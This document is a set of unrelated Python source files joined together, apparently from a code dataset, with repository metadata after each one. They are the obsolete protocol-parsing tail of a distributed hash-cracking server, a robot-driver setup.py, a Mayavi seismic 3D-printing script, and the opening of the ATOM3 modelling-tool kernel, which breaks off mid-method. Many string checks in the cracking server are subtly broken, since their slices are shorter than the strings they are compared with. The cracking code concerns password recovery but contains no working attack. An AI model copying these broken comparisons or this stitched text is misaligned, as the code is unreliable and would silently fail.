break
else:
tempCrashIP = tempCrashIP + inboundString[i]
if(len(tempCrashIP) < 1): #if the length is less than one, stop performing an IP check
return False
print "WARNING: A Client has issued the CRASHED command"
print "The Crashed Client IP: " + tempCrashIP
self.listOfCrashedClients.append(tempCrashIP)
print "INFO: The crashed client's IP address has been added to the listOfCrashedClients"
#look through listOfConnected clients and find the matching ip address
print "STATUS: Looking for matching IP address in list of clients..."
foundMatch= False
tempAddr2= ""
for index in range(0, len(self.listOfClients)):
tempSock, tempAddr= self.listOfClients[index] #get socket and ip address of client
print "STATUS: Copying list of clients' IP Address to a new string"
tempAddr2= str(tempAddr[0])
print "STATUS: Comparing IP Addresses..."
if(tempCrashIP == tempAddr2):
print "INFO: Matching IP address was found in the list of clients"
#print "DEBUG: tempAddr=" + str(tempAddr)
del self.listOfClients[index]
print "INFO: The crashed client " + str(tempAddr) + " was removed from the list of clients"
foundMatch= True
self.recordOfInboundCommandsFromClientToServer['CRASHED'] = (self.recordOfInboundCommandsFromClientToServer['CRASHED'] + 1)
break
else:
print "INFO: No Match found yet. " + str(tempCrashIP) + " != " + str(tempAddr2)
if(foundMatch == False):
print "WARNING: No Matching IP address was found in the list of clients"
print "INFO: Unable to Find the Crashed IP: " +str(tempCrashIP) + " "
return True
else:
return False
else:
return False
else:
return False
else:
return False
else:
return False
else:
return False
else:
return False
except Exception as inst:
print "============================================================================================="
print "ERROR: An exception was thrown in the Server-Client Inbound checkForCrashedCommand Try Block"
#the exception instance
print type(inst)
#srguments stored in .args
print inst.args
#_str_ allows args tto be printed directly
print inst
print "============================================================================================="
#==================================================================================================
#CHUNK PARSING FUNCTIONS (THESE FUNCTIONS ARE ALL OBSOLETE)
#==================================================================================================
#-------------------------------------------------------------------------------------------------
#Determine the method being used (bruteforce,dictionary,rainbowmaker,rainbowuser)
#-------------------------------------------------------------------------------------------------
#check for bruteforce
def checkForBruteForceMethod(self,inboundString):
if(inboundString[0:9] == "bruteforce"):
print "Chunk Method: bruteforce"
return True
else:
return False
#check for dictionary
def checkForDictionaryMethod(self,inboundString):
if(inboundString[0:9] == "dictionary"):
print "Chunk Method: dictionary"
return True
else:
return False
#check for rainbowmaker
def checkForRainbowMakerMethod(self,inboundString):
if(inboundString[0:11] == "rainbowmaker"):
print "Chunk Method: rainbowmaker"
return True
else:
return False
#check for rainbowuser
def checkForRainbowUserMethod(self,inboundString):
if(inboundString[0:10] == "rainbowuser"):
print "Chunk Method: rainbowuser"
return True
else:
return False
#-------------------------------------------------------------------------------------------------
#Determine the algorithm being used (md5,sha1,sha256,sha512)
#-------------------------------------------------------------------------------------------------
#check for md5
def checkForMD5Algorithm(self,inboundString):
if(inboundString[0:2] == "md5"):
print "Chunk Algorithm: md5"
return True
else:
return False
#check for sha1
def checkForSHA1Algorithm(self,inboundString):
if(inboundString[0:3] == "sha1"):
print "Chunk Algorithm: sha1"
return True
else:
return False
#check for sha256
def checkForSHA256Algorithm(self,inboundString):
if(inboundString[0:5] == "sha256"):
print "Chunk Algorithm: sha256"
return True
else:
return False
#check for sha512
def checkForSHA512Algorithm(self,inboundString):
if(inboundString[0:5] == "sha512"):
print "Chunk Algorithm: sha512"
return True
else:
return False
#-------------------------------------------------------------------------------------------------
#Obtain the hash code
#-------------------------------------------------------------------------------------------------
#No function needed for this
#-------------------------------------------------------------------------------------------------
#Determine the Alphabet Choice (a,A,m,M,d)
#-------------------------------------------------------------------------------------------------
#check for a
def checkForLowerCaseAlphabet(self,inboundString):
if(inboundString[0] == "a"):
print "Chunk Alphabet: a"
return True
else:
return False
#check for A
def checkForUpperCaseAlphabet(self,inboundString):
if(inboundString[0] == "A"):
print "Chunk Alphabet: A"
return True
else:
return False
#check for m
def checkForLowerCaseAlphaNumeric(self,inboundString):
if(inboundString[0] == "m"):
print "Chunk AlphaNumeric: m"
return True
else:
return False
#check for M
def checkForUpperCaseAlphaNumeric(self,inboundString):
if(inboundString[0] == "M"):
print "Chunk AlphaNumeric: M"
return True
else:
return False
#check for d
def checkForDigitsAlphabet(self,inboundString):
if(inboundString[0] == "d"):
print "Chunk Alphabet: d"
return True
else:
return False
#-------------------------------------------------------------------------------------------------
#Determine the minCharacters (1,10,16)
#-------------------------------------------------------------------------------------------------
#check for 1
def checkForMinCharacter1(self,inboundString):
if(inboundString[0] == "1"):
print "Chunk minCharacter: 1"
return True
else:
return False
#check for 10
def checkForMinCharacter10(self,inboundString):
if(inboundString[0:1] == "10"):
print "Chunk minCharacter: 10"
return True
else:
return False
#check for 16
def checkForMinCharacter16(self,inboundString):
if(inboundString[0:1] == "16"):
print "Chunk minCharacter: 16"
return True
else:
return False
#-------------------------------------------------------------------------------------------------
#Determine the maxCharacters (1,10,16)
#-------------------------------------------------------------------------------------------------
#check for 1
def checkForMaxCharacter1(self,inboundString):
if(inboundString[0] == "1"):
print "Chunk maxCharacter: 1"
return True
else:
return False
#check for 10
def checkForMaxCharacter10(self,inboundString):
if(inboundString[0:1] == "10"):
print "Chunk maxCharacter: 10"
return True
else:
return False
#check for 16
def checkForMaxCharacter16(self,inboundString):
if(inboundString[0:1] == "16"):
print "Chunk maxCharacter: 16"
return True
else:
return False
#-------------------------------------------------------------------------------------------------
#Determine the Prefix (adf,234,qw3#k)
#-------------------------------------------------------------------------------------------------
#check for adf
def checkForADFPrefix(self,inboundtSring):
if(inboundtSring[0:2] == "adf"):
print "Chunk Prefix: adf"
return True
else:
return False
#check for 234
def checkFor234Prefix(self,inboundString):
if(inboundString[0:2] == "234"):
print "Chunk Prefix: 234"
return True
else:
return False
#check for qw3#k
def checkForQW3Prefix(self,inboundString):
if(inboundString[0:4] == "qw3#k"):
print "Chunk Prefix: qw3#k"
return True
else:
return False
#-------------------------------------------------------------------------------------------------
#Determine the File Location (0,1213,23665)
#-------------------------------------------------------------------------------------------------
#check for 0
def checkForFileLocation0(self,inboundString):
if(inboundString[0] == "0"):
print "Chunk File Location: 0"
return True
else:
return False
#check for 1213
def checkForFileLocation1213(self,inboundString):
if(inboundString[0:3] == "1213"):
print "Chunk File Location: 1213"
return True
else:
return False
#check for 23665
def checkForFileLocation23665(self,inboundString):
if(inboundString[0:4] == "23665"):
print "Chunk File Location: 23665"
return True
else:
return False
#-------------------------------------------------------------------------------------------------
#Determine the Width (1,100,100000)
#-------------------------------------------------------------------------------------------------
#check for 1
def checkForWidth1(self,inboundString):
if(inboundString[0] == "1"):
print "Chunk Width: 1"
return True
else:
return False
#check for 100
def checkForWidth100(self,inboundString):
if(inboundString[0:2] == "100"):
print "Chunk Width: 100"
return True
else:
return False
#check for 100000
def checkForWidth100000(self,inboundString):
if(inboundString[0:5] == "100000"):
print "Chunk Width: 100000"
return True
else:
return False
#-------------------------------------------------------------------------------------------------
#Determine the Height (1,100,10000)
#-------------------------------------------------------------------------------------------------
#check for 1
def checkForHeight1(self,inboundString):
if(inboundString[0] == "1"):
print "Chunk Height: 1"
return True
else:
return False
#check for 100
def checkForHeight100(self,inboundString):
if(inboundString[0:2] == "100"):
print "Chunk Height: 100"
return True
else:
return False
#check for 10000
def checkForHeight10000(self,inboundString):
if(inboundString[0:5] == "10000"):
print "Chunk Height: 10000"
return True
else:
return False
#=============================================
#Find the socket that matches the IP address
#=============================================
def findClientSocket(self,clientIPAddress):
try:
foundMatch= False
for x in range(0, len(self.listOfClients)):
tempSock, tempAddr = self.listOfClients[x]
if(clientIPAddress == tempAddr[0]):
print "INFO: Found client's corresponding socket"
foundMatch= True
return (tempSock,tempAddr)
else:
print "INFO: No corresponding socket found yet. " + str(clientIPAddress) + "!=" + str(tempAddr[0])
if(foundMatch == False):
print "WARNING: No corresponding socket was found to match the IP: " + str(clientIPAddress)
return None
except Exception as inst:
print "============================================================================================="
print "ERROR: An exception was thrown in the findClientSocket Try Block"
#the exception instance
print type(inst)
#srguments stored in .args
print inst.args
#_str_ allows args tto be printed directly
print inst
print "============================================================================================="
|
COCS4950G7/COSC4950
|
Source/Network/Obsolete/NetworkServer_r9E.py
|
Python
|
gpl-3.0
| 90,551
|
[
"ADF"
] |
8d6e131289202630223e045070d5867df2ed8ceafa7054fb7012c6fe98f65303
|
# coding=utf-8
# !/usr/bin/env python
import sys
try:
from setuptools import setup
except ImportError:
sys.stderr.write('using distutils\n')
from distutils.core import setup
with open('requirements.txt') as f:
required = f.read().splitlines()
required = [ req.split('#egg=')[1] if '#' in req else req for req in required ]
setup(
name='amber-python-drivers',
packages=[
'amberdriver',
'amberdriver.common',
'amberdriver.dummy',
'amberdriver.hokuyo',
'amberdriver.drive_to_point',
'amberdriver.drive_support',
'amberdriver.null',
'amberdriver.roboclaw',
'amberdriver.tools',
'amberdriver.tests'
],
package_dir={
'amberdriver': 'src/amberdriver',
'amberdriver.common': 'src/amberdriver/common',
'amberdriver.dummy': 'src/amberdriver/dummy',
'amberdriver.hokuyo': 'src/amberdriver/hokuyo',
'amberdriver.drive_to_point': 'src/amberdriver/drive_to_point',
'amberdriver.drive_support': 'src/amberdriver/drive_support',
'amberdriver.null': 'src/amberdriver/null',
'amberdriver.roboclaw': 'src/amberdriver/roboclaw',
'amberdriver.tools': 'src/amberdriver/tools',
'amberdriver.tests': 'src/amberdriver/tests'
},
package_data={'': [
'src/amberdriver/common/amber.ini',
'src/amberdriver/dummy/dummy.ini',
'src/amberdriver/hokuyo/hokuyo.ini',
'src/amberdriver/drive_to_point/drive_to_point.ini',
'src/amberdriver/drive_support/drive_support.ini',
'src/amberdriver/roboclaw/roboclaw.ini',
'src/amberdriver/tools/main.ini'
]},
data_files=[
('', [
'src/amberdriver/common/amber.ini',
'src/amberdriver/dummy/dummy.ini',
'src/amberdriver/hokuyo/hokuyo.ini',
'src/amberdriver/drive_to_point/drive_to_point.ini',
'src/amberdriver/drive_support/drive_support.ini',
'src/amberdriver/roboclaw/roboclaw.ini',
'src/amberdriver/tools/main.ini'
]),
],
test_suite="amberdriver.tests",
include_package_data=True,
install_requires=required,
version='1.19',
description='Amber drivers in python',
author=u'Paweł Suder',
author_email='pawel@suder.info',
url='http://project-capo.github.io/',
download_url='http://github.com/project-capo/amber-python-drivers/',
keywords=[
'amber',
'dummy',
'hokuyo',
'drive to point',
'drive support',
'roboclaw',
'panda'
],
classifiers=[
'Programming Language :: Python',
'Development Status :: 4 - Beta',
'Environment :: Other Environment',
'Intended Audience :: Developers',
'License :: Other/Proprietary License',
'Operating System :: OS Independent',
],
long_description='''\
'''
)
|
project-capo/amber-python-drivers
|
setup.py
|
Python
|
mit
| 2,925
|
[
"Amber"
] |
9e92427f76d9d504beccc6b60836c17759792aa08f6cb44fe462b8c212bf3f6c
|
import tempfile
from mayavi import mlab
import Image
import numpy as np
import geoprobe
import scipy.ndimage
import matplotlib.colors as mcolors
import matplotlib.cm as cm
import utils
def main():
vol, top = load_data()
downsample = 3
fig = mlab.figure(bgcolor=(1,1,1))
x, y, z = hor2xyz(top, vol, downsample)
build_sides(vol, x, y, z, vol.nz)
# Build top
seafloor = top_texture(top, vol)
top_mesh = mlab.mesh(x, y, z)
texture(top_mesh, np.flipud(seafloor.T), cm.gray)
build_base(x, y, z, vol)
utils.present(fig)
def load_data():
top = geoprobe.horizon('data/seismic/Horizons/channels.hzn')
vol = geoprobe.volume('data/seismic/Volumes/example.vol')
vol.data = vol.load()
top = smooth_horizon(top)
return vol, top
def build_base(x, y, z, vol, wall_thick=5):
z0 = -vol.nz * np.ones_like(z)
sl = np.s_[wall_thick:-wall_thick, wall_thick:-wall_thick]
z0[sl] = z[sl] - wall_thick
return mlab.mesh(x, y, z0, color=(1, 1, 1))
def build_sides(vol, x, y, z, base, zbase=None):
for axis in [0, 1]:
for val in [0, -1]:
slices = [slice(None), slice(None), slice(None, base)]
slices[axis] = val
slices = tuple(slices)
build_side(vol, slices, x, y, z, zbase)
def build_side(vol, sl, x, y, z, zbase=None):
data = vol.data
full = sl
sl = sl[:2]
z0, x0, y0 = z[sl], x[sl], y[sl]
if zbase is None:
base = -np.arange(data.shape[2])[full[-1]].max()
base = base * np.ones_like(z0)
else:
base = zbase[sl]
z0 = np.vstack([z0, base])
x0 = np.vstack([x0, x0])
y0 = np.vstack([y0, y0])
mesh = mlab.mesh(x0, y0, z0)
sl = slice(-z0.max(), -z0.min(), full[-1].step)
full = tuple([full[0], full[1], sl])
dat = data[full].T
cmap = geoprobe.colormap('data/seismic/Colormaps/brown_black').as_matplotlib
texture(mesh, dat, cmap)
return mesh
def hor2xyz(hor, vol, downsample=1):
z = hor.grid
z = vol.model2index(z, axis='z', int_conversion=False)
z = -z.T
ds = downsample
y, x = np.mgrid[:z.shape[0], :z.shape[1]]
x,y,z = x[::ds, ::ds], y[::ds, ::ds], z[::ds, ::ds]
return x, y, z
def top_texture(hor, vol):
"""RMS Amplitude Extraction on Bottom Horizon."""
chan = geoprobe.utilities.extractWindow(hor, vol, 0, 4)
chan = (chan.astype(float) - 128.0)**2
chan = np.sqrt(chan.mean(axis=-1))
return chan
def texture(mesh, data, cmap, vmin=None, vmax=None):
if vmin is None:
vmin = data.min()
if vmax is None:
vmax = data.max()
dat = scipy.ndimage.zoom(data, 3)
norm = mcolors.Normalize(vmin, vmax)
rgba = cmap(norm(dat))
rgba = (255 * rgba).astype(np.uint8)
im = Image.fromarray(rgba).convert('RGB')
# Evil, ugly hack. Still don't understand why RGB texturing isn't working
# correctly without bringing in an image. Fix later!
_, fname = tempfile.mkstemp()
with open(fname, 'w') as f:
im.save(f, 'PNG')
utils.texture(mesh, fname=fname)
def smooth_horizon(hor):
z = hor.grid
z = scipy.ndimage.median_filter(z.astype(float), 4)
z = scipy.ndimage.gaussian_filter(z, 1.5)
xmin, xmax, ymin, ymax = hor.grid_extents
y, x = np.mgrid[ymin:ymax+1, xmin:xmax+1]
return geoprobe.horizon(x.flatten(), y.flatten(), z.flatten())
main()
|
joferkington/scipy2015-3d_printing
|
make_base.py
|
Python
|
mit
| 3,380
|
[
"Mayavi"
] |
49aa995f949fb04eddf7a84e8fe8454e40a7296a62b441692cb4a879fc6e75f1
|
# __ File: ATOM3.py __________________________________________________________________________________________________
#
# Implements : class ATOM3
# Author : Juan de Lara and Denis Dube
# Description : This is the ATOM3 kernel.
# Modified : 26 Feb, 2005
# Changes :
# About halfway through this file, where there's a lot of dashes, the
# code is from Juan de Lara without modification. The rest is new/modified
# by Denis Dube between Summer 2004 and Winter 2005
# Note: This isn't 100% true, I've somehow managed to modify stuff everywhere...
# ____________________________________________________________________________________________________________________
PRINT_TIME_INFO = True
#if( PRINT_TIME_INFO ): print "\nStarting AToM3\n"
import time
t = time.time()
# Python code imports
import sys
import os
import tkFileDialog
import string
import Dialog
import re
import distutils.file_util
import threading
from Tkinter import *
# Path setting
try:
from FilePaths import getCriticalPaths
except:
sys.exit(1)
CRITICAL_PATHS = getCriticalPaths()
if( PRINT_TIME_INFO ):
print "Python code imports & path setting completed in: %.3f seconds" % ( time.time() - t )
t = time.time()
from ASGNode import *
from ASG import *
from ATOM3TypeDialog import *
from ATOM3List import *
from ATOM3TypeInfo import *
from GGrule import *
from GraphGrammarEdit import *
from GraphRewritingSys import *
from StatusBar import *
from Console import *
from DebugConsole import *
from GrammarExecution import *
#from TypeCodeGen import *
from Buttons import *
#from createButtons import *
if( PRINT_TIME_INFO ):
print "ATOM3 core source code imported in: %.3f seconds" % ( time.time() - t )
t = time.time()
#--------------- Summer 2004+ imports added by Denis Dube -----------------
#from UI_StateChart import UI_StateChart
#from KeyBinds import createBindings
from NoConsole import NoConsole
from DrawConnections import drawConnections as drawConnectionsBridge
from DrawConnections import showConnection as showConnectionBridge
from CallbackState import CallbackState
from ArrowEditor import ArrowEditor
from PilotArrow import PilotArrow
from SelectionBox import SelectionBox
from StaticMenus import buildAllMenus, toggleMainToolMenu
from popupMenuCreator import PopupMenuCreator
from OptionDatabase import OptionDatabase
from OptionDialog import OptionDialog
from Undo import Undo
from Postscript import Postscript
from Utilities import selectAllVisibleObjects, optimizeConnectionPorts
from Exporter import Exporter
from Embedded_Images import Embedded_Images
from FilePaths import SOURCE_CODE_PATH, META_MODEL_PATH, MODEL_PATH
from FilePaths import OPTIONS_PATH, USER_MMODEL_PATH, USER_MODEL_PATH
from FilePaths import USER_AREA_RECREATED, USER_PATH,USER_NAME
from FilePaths import doTempFileCleanup, doTempCleanupALL
from FilePaths import doTempCleanupChoice
from Cursors import setCursor
from __init__ import BASE_PATH
from UI_Behavior_Loaders import loadKeybindsOption, loadBehaviorModelOption
from UI_Scoping import UI_Scoping
import ForceTransfer
import SnapGrid
from Qoca.constraints.QocaSolver import QocaSolver
from Qoca.constraints.QocaSolverAbstract import QocaSolverAbstract
from Qoca.client.__init__ import QOCAPATH
from Qoca.constraints.QocaConstants import SOLVER_CASS, SOLVER_EQ, SOLVER_INEQ
if( PRINT_TIME_INFO ):
print "User-interface source code imported in: %.3f seconds\n" % ( time.time() - t )
class ATOM3(Frame):
VERSION = 'v0.3'
ROOT_ATOM3_INSTANCE = None
# Constants that define the operations' mode
IDLEMODE = "IDLEMODE"
EXPANDModel = "EXPANDModel"
INSERTModel = "INSERTModel"
SELECTgraph = "SELECTgraph"
# Constants that define option keys
FULLSCREEN = 'Fullscreen'
EXTRA_CONSOLES = 'Extra Consoles'
GEN_GRAPHICS = 'Generate Graphics'
UI_BEHAVIOR_MODEL = 'UI Behavior Model'
UI_KEYBINDS = 'UI Key Bindings'
#INIT_METAMODEL = 'Initial Meta-Model'
OPEN_FORMALISMS = 'Open Formalisms'
GG_CODE_GEN = 'Graph Grammar Code Gen.'
CODE_GEN_DIR = 'Code Gen. Dir.'
STATIC_MENUBAR = 'Menubar'
SMOOTH_ARROWS = 'Smooth Arrows'
LASTOPEN_MODEL = 'Last open model'
LASTOPEN_MMODEL = 'Last open meta-model'
LAST_INITIAL_DIRS = 'Last Initial Dirs'
SOURCE_PATHS = 'Model Source Paths'
UNDO_ENABLED = 'Enable Undo'
UNDO_MODS_PER_SAVE= 'Modifications per undo'
UNDO_DEPTH = 'Undo depth'
TOOLBAR_HEIGHT = 'Toolbar height'
BUTTONS_PER_ROW = 'Buttons per row'
QOCA_OPTIONS = 'QOCA Options'
# Main Canvas Size (minimum size) & Scrollable region
MODEL_AREA = ( 300, 300 )
CANVAS_SIZE_TUPLE = (0,0,1500,1500)
# Attributes for whom we use 'fill'
fillAttributes = ['line', 'text']
# How many recent models/meta-models to keep in memory
FILE_HISTORY_DEPTH= 10
# Loaded Meta-Model String Pattern
LOADED_MM_PATTERN = re.compile( "\AloadedMMName *= *'(\w*)'" )
# Loaded Meta-Model List Pattern
LOADED_MM_LIST_PATTERN = re.compile( "\AloadedMMName *= *\[[\s\,\'\w]*\]" )
def __init__(self, parent, GUIModelName=None, IsMainKernel = 0,
genGraphics = 1, ASGroot = None, editGGLabels = 0):
Frame.__init__(self, parent) # call the Frame constructor
# Makes sure that AToM3 has the focus
parent.focus_force()
# Let's make AToM3 a bit more accessible... - Denis
if(ATOM3.ROOT_ATOM3_INSTANCE == None):
ATOM3.ROOT_ATOM3_INSTANCE = self
self.parent = parent
#self.opBar = Frame(self.parent)
self.isOpBarPresent = 0
#self.grphBar = Frame(self.parent)
self.isGrphBarPresent = 0
self.numImg = -1 # Number of images loaded in the buttons. Added 27/Jul/2002.
self.buttonImage = [] # List with the images loaded. Added 27/Jul/2002.
self.GGforCodeGen = "createButtons" # Name of the graph grammar for code generation. Added 27/Jul/2002.
self.name2GGdict = {}
self.editGGLabel = editGGLabels # store if we are editing a Graph Grammar Rule
self.ASGroot = ASGroot
self.userActionsMap = {} # mapping between user actions and functions
self.types = {} # dictionary to store the types and handling functions
self.newTypes = [] # list with the newly added types
self.IsMainKernel = IsMainKernel # Wether I'm the main Kernel Window or Not.
self.option=None
self.codeGenDir = ""
self.coupledGG = None # info (object of type GraphGrammarExecution) with the graph-grammars to be executed on the model
self.console = None
self.entitiesInMetaModel = {} # dictionary with the entities defined by each meta-model.
self.GUIModelName = None # name of the GUI Model currently in use
self.metaModelName = None # name of the meta-model
self.modes = {} # dictionary in which the keys are the buttons, and the contents are the modes
self.mode = self.IDLEMODE
self.openGUI_ModelDict = dict() # *_MM classname to *_META classname mapping
self.showNamedPortMessage = True
self.setupOptionDatabase()
self.assembleToolbar()
self.isLoadingModel = False
self.inGGeditDialog = False
if self.IsMainKernel:
if not GUIModelName: # no metamodel specified, see default
#self.GUIModelName = self.optionsDatabase.get(self.INIT_METAMODEL)
if( self.openFormalismsList ): self.GUIModelName = self.openFormalismsList[0]
else: self.GUIModelName = None
else: # override the options
self.GUIModelName = GUIModelName
else:
self.GUIModelName = GUIModelName # meta model name currently in use
# Start AToM3 with full screen coverage
try:
if( self.optionsDatabase.get(self.FULLSCREEN) ):
if( sys.platform == 'win32' ): parent.wm_state('zoomed')
else: parent.geometry("%dx%d+0+0"%(1600,1200))
# Start in "Debugging" mode. Covers up the console as little as possible.
else: parent.geometry("+%d+%d"%(0,0))
except:
pass # Occurs if using AToM3 inside a Tkinter Frame instead of Toplevel window
self.openMetaModels = ATOM3List([0,0,1,0], ATOM3String) # list with the names of the open metamodels
self.metaModelFileNames = [] # list with the file names of the open metamodels
self.ConnectivityMap = {} # A dictionary to store how to connect entities.
self.CardinalityTable= {} # A table to store the cardinalities...
self.buttonList = [] # A list of buttons.
#------------------------- Canvas Panel Init --------------------------
canvasPanel= Frame(self.parent, name = "canvaspanel")#, width=800, height=500)
# Create the modelling zone, width=700, height=500,
self.UMLmodel = Canvas(canvasPanel, name = "modelcanvas",
borderwidth=5, scrollregion=self.CANVAS_SIZE_TUPLE,
relief=RIDGE, bg = 'white',
width=self.MODEL_AREA[0],
height=self.MODEL_AREA[1])
# scrollbars for drawarea
bottom_scrollbar = Frame(canvasPanel)
self.UMLmodel.scrollX = Scrollbar(bottom_scrollbar, orient=HORIZONTAL)
self.UMLmodel.scrollY = Scrollbar(canvasPanel, orient=VERTICAL)
# link canvas, scrollbars, and events
self.UMLmodel['xscrollcommand'] = self.UMLmodel.scrollX.set
self.UMLmodel['yscrollcommand'] = self.UMLmodel.scrollY.set
self.UMLmodel.scrollX['command'] = self.UMLmodel.xview
self.UMLmodel.scrollY['command'] = self.UMLmodel.yview
self.UMLmodel.square = Canvas(bottom_scrollbar, width=20, height=20)
self.UMLmodel.scrollX.pack(side=LEFT, fill = X, expand = 1)
self.UMLmodel.square.pack(side=RIGHT)
bottom_scrollbar.pack(side=BOTTOM, fill = X, expand = 0)
self.UMLmodel.pack(side=LEFT, fill = BOTH, expand=1)
self.UMLmodel.scrollY.pack(side=LEFT, fill = Y, expand = 0)
self.statusbar = StatusBar(parent)
# ------------------------------- Final Packing ---------------------------
#self.toolBarFrame.pack(side=TOP, fill=X, expand = 1) # Make toolbar visible
self.isConstraintBarActive = False # Afraid to remove this...
canvasPanel.pack(side=TOP, fill=BOTH, expand=1)
self.canvasPanel = canvasPanel
self.statusbar.pack(side = TOP, fill = X, expand = 0)
#------------------------ User Interface Init -------------------------
self.exporter = Exporter( self )
self.cb = CallbackState( self.UMLmodel, VisualObj.Tag2ObjMap, self.parent )
self.pilotArrow = PilotArrow( self.UMLmodel )
self.selectionBox = SelectionBox( self.UMLmodel )
self.postscriptBox = Postscript( self, self.UMLmodel )
self.arrowEditor = ArrowEditor( self.UMLmodel, self.parent )
self.undoer = Undo( self )
self.undoer.setUndoParameters( self.optionsDatabase.get(self.UNDO_ENABLED),
self.optionsDatabase.get(self.UNDO_DEPTH),
self.optionsDatabase.get(self.UNDO_MODS_PER_SAVE) )
# Should new arrows be drawn as smooth?
if( self.optionsDatabase.get(self.SMOOTH_ARROWS) ):
self.pilotArrow.toggleCreateSmooth()
# Get the snapGrid rolling...
self.snapGridInfoTuple = None
SnapGrid.applyLayout(self)
# Deploy automatic force transfer? WARNING: Uses obsolete version of FTA!
self.isAutoForceTransferEnabled = False
ForceTransfer.applyLayout( self, initilizeOnly = True )
# Warn the user if the User area (directories, options, etc. ) has been rebuilt
if( USER_AREA_RECREATED ):
tkMessageBox.showinfo(
"User Settings Folders Created",
"AToM3 has created " + str( USER_AREA_RECREATED ) + " new directories "+
"to contain user settings. The root directory of these settings is: "+
USER_PATH + "\n\nThese directories contain only option preferences and "+
"temporary files. There should not be any need to modify these files manually.",
parent=self)
# Warn the user why graphics aren't working the way they should :D
if( not self.genGraphics ):
tkMessageBox.showwarning(
"Warning: Generate Graphics Disabled!",
"You will not be able to open models with graphical attributes\n\n"+
"If this is not what you wanted, please visit the options",
parent=self)
# Creates popup menus
self.popupMenuCreator = PopupMenuCreator( self )
# Behaviour model for the user interface
# Assumes the statechart is going to need a TkInstance for timed behavior
try:
self.UI_Statechart.initModel( TkInstance=self )
except:
print 'ERROR: Your probably trying to use a UI StateChart compiled' \
+'with the regular threaded version of SCC. This will not work!'
raise
self.UI_Statechart.event("Start",self)
# Setup UI zones, makes it possible to use different UI charts for
# different zones of the canvas
self.UI_scope = UI_Scoping(self.UMLmodel, self.UI_Statechart)
# Loads model paths from options into sys.paths
self.sourcePathOptionLoad()
#---------------------- OPEN INITIAL META MODEL -----------------------
#print "self.GUIModelName, ASGroot = ", self.GUIModelName, ASGroot
#print "Opening MetaModel : ", self.GUIModelName
# The initial meta-model may do stuff that requires fill type info...
self.typeList = ATOM3List([1,1,1,0], ATOM3TypeInfo, self )
from defaultFillTypesInfo import defaultFillTypesInformation
defaultFillTypesInformation(self)
self.fillDictionaryWithTypes()
# Secondary AToM3 instance...
if(GUIModelName):
# Special situation: We want to open a model, not just a formalism!
if(GUIModelName[-7:].upper() == '_MDL.PY'):
self.open(GUIModelName) # GUIModelName = Full path to a model file
# Opening a formalism
else:
self.console.appendText("Initializing AToM3 with GUI: "+self.GUIModelName) # put the message in the console
if(self.GUIModelName): # if a metamodel must be loaded...
if not self.ASGroot:
self.openMetaModel(self.GUIModelName, 0, 1) # create a new ASGroot if we do not have one
else:
self.openMetaModel(self.GUIModelName, 0, 0) # do not create a new ASGroot if we have one.
# Case when AToM3 started up for the first time
else:
for formalism in self.openFormalismsList:
self.GUIModelName = formalism
if( ASGroot and
formalism == ASGroot.getGUIName( ASGroot.metaModelName )[0] ):
pass
self.console.appendText("Initializing AToM3 with GUI: "+self.GUIModelName) # put the message in the console
if(self.GUIModelName): # if a metamodel must be loaded...
if not self.ASGroot:
self.openMetaModel(self.GUIModelName, 0, 1) # create a new ASGroot if we do not have one
else:
self.openMetaModel(self.GUIModelName, 1, 0) # do not create a new ASGroot if we have one.
#------------------------- Final Initilization ------------------------
# Binds & Menus
try:
self.parent.protocol("WM_DELETE_WINDOW", self.exitFromATOM3)
except:
pass # Occurs if using AToM3 inside a Tkinter Frame instead of Toplevel window
if( not self.__dict__.has_key( 'mmtoolMenu' ) ):
buildAllMenus(self) # Creates a topLevel menu
# Parms: AToM3_instance, TK_Canvas, TK_Root_Window
self.createBindingsMethod(self, self.UMLmodel, self.parent )
if self.metaModelName: # if a metamodel must be loaded...
try:
self.typeList = ATOM3List([1,1,1,0], ATOM3TypeInfo, self )
self.fillTypesInformation(self) # fill the types list
self.fillDictionaryWithTypes() # Convert list into a dictionary
except AttributeError:
print "File "+self.metaModelName+" is not a valid meta-model... Aborting"
self.quit()
sys.exit(1)
self.fromClass = None # initial class in a connection operation
self.toClass = None # second class in a connection operation
#self.globalConstraintsDict = {} # global constraints dictionary
self.sem_objFrom = None # For connecting objects
self.sem_objTo = None # For connecting objects
self.EditingGraphGrammar = None # Graph Grammar being edited currently
self.theKeyword = None
self.inter_connect_points = [] # list of intermediate connecting points
# Not sure what this is doing! - Denis
if( self.ASGroot and not IsMainKernel ):
# open the necessary metamodels (look over the merged ASGs)!
mergeds = []+self.ASGroot.mergedASG
for asg_merged in mergeds:
print "Opening metamodel::", asg_merged.metaModelName
#name = ASGroot.getGUIName( asg_merged.metaModelName )[0]
#if( name not in self.openFormalismsList ):
# print name, self.openFormalismsList
self.openMetaModel(asg_merged.metaModelName, 0, 0)
self.ASGroot.writeContents(self, genGraphics) # draw contents of ASGroot if any
# Don't ask politely, just grab the bloody focus :D
# NOTE: this is *needed* because a tkMessageBox can steal the focus
# on startup, thus killing all the keybindings! Ewwww.
self.parent.focus_force()
self.systemRestorePoint = ( sys.modules.copy() , sys.path[:] )
#print sys.path, "<--- System restore point\n\n"
def debug(self, console=True ):
# Handy way to find how you get to some piece of code...
from traceback import print_stack
if( console ): print print_stack()
return str( print_stack() )
"""
# Here's how to get the name of the file your in (and just that)
from traceback import format_stack
stack = format_stack(limit=1)
if( stack ):
text = stack[0].split('\n')[0]
if( text[:7] == ' File ' ): text = text[7:]
"""
def getCanvas( self ):
return self.UMLmodel
def assembleToolbar(self):
"""
This method creates a self.toolBar Frame that is inside a XY-scrollable
canvas area. The frame can be used just like a regular frame :D
"""
self.toolBarFrame = Frame(self.parent)
self.toolBarBottomFrame = Frame(self.toolBarFrame)
self.toolBarCanvas = Canvas(master=self.toolBarFrame,
takefocus=1,
height= self.optionsDatabase.get(self.TOOLBAR_HEIGHT),
scrollregion= (0,0,0,0) )
self.toolBarCanvas.scrollX = Scrollbar(self.toolBarBottomFrame, takefocus=0, orient=HORIZONTAL)
self.toolBarCanvas.square = Canvas(self.toolBarBottomFrame, width=16, height=16)
self.toolBarCanvas.scrollY = Scrollbar(self.toolBarFrame, takefocus=0, orient=VERTICAL)
# Configure the scrollies
self.toolBarCanvas.scrollX.config(command=self.toolBarCanvas.xview )
self.toolBarCanvas.config( xscrollcommand=self.toolBarCanvas.scrollX.set)
self.toolBarCanvas.scrollY.config(command=self.toolBarCanvas.yview )
self.toolBarCanvas.config( yscrollcommand=self.toolBarCanvas.scrollY.set)
# This is the beautiful part: the Frame is tucked into the canvas
self.toolBar = Frame(self.toolBarCanvas)
